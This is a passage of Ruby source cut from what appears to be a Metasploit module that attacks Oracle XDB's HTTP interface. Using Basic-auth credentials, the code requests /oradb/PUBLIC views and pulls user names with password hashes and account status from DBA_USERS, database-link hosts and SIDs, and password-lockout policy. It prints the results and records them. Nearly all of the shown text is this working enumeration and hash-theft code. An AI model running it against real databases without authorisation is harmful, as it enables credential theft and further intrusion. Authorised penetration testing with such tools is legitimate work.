where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Database Link Information ==> as #{u}")          doc.elements.each('ALL_DB_LINKS/ROW') do |e|            next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil)            h = e.elements['HOST'].get_text            d = e.elements['DB_LINK'].get_text            us = e.elements['USERNAME'].get_text            sid = h.to_s.scan(/$SID\s\=\s(\S+)$\)\)/)[0]            if(h.to_s.match(/^$DESCRIPTION/) )              h = h.to_s.scan(/\(HOST\s\=\s(\S+)$\(/)[0]            end            if(sid and sid != "")              print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")              report_note(                :host => h[0],                :proto => 'tcp',                :port => datastore['RPORT'],                :sname => 'xdb',                :type => 'oracle_sid',                :data => sid,                :update => :unique_data              )            else              print_good("\tLink: #{d}\t#{us}\@#{h}")            end          end        end      end      # get users      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/DBA_USERS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Username/Hashes on #{ip}:#{datastore['RPORT']} ==> as #{u}")        doc.elements.each('DBA_USERS/ROW') do |user|          us = user.elements['USERNAME'].get_text          h = user.elements['PASSWORD'].get_text          as = user.elements['ACCOUNT_STATUS'].get_text          print_good("\t#{us}:#{h}:#{as}")          good = true          if(as.to_s == "OPEN")            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Active Account #{u}:#{h}:#{as}",              :update => :unique_data            )          else            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Disabled Account #{u}:#{h}:#{as}",              :update => :unique_data            )          end        end      end      # get password information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/USER_PASSWORD_LIMITS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Password Policy ==> as #{u}")        fla=plit=pgt=prt=prm=plot=''        doc.elements.each('USER_PASSWORD_LIMITS/ROW') do |e|          next if e.elements['RESOURCE_NAME'] == nil          case            when(e.elements['RESOURCE_NAME'].get_text == 'FAILED_LOGIN_ATTEMPTS')              fla = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LIFE_TIME')              plit = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_TIME')              prt = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_MAX')              prm = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LOCK_TIME')              plot = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_GRACE_TIME')              pgt = e.elements['LIMIT'].get_text          end        end        print_good(          "\tFailed Login Attempts: #{fla}\n\t" +          "Password Life Time: #{plit}\n\t" +          "Password Reuse Time: #{prt}\n\t" +          "Password Reuse Max: #{prm}\n\t" +          "Password Lock Time: #{plot}\n\t" +          "Password Grace Time: #{pgt}"        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Maximum Reuse Time: #{prm}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Reuse Time: #{prt}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Life Time: #{plit}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Fail Logins Permitted: #{fla}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Lockout Time: #{plot}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Password Grace Time: #{pgt}",          :update => :unique_data        )      end      break if good    end # users.each    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

Tag

#git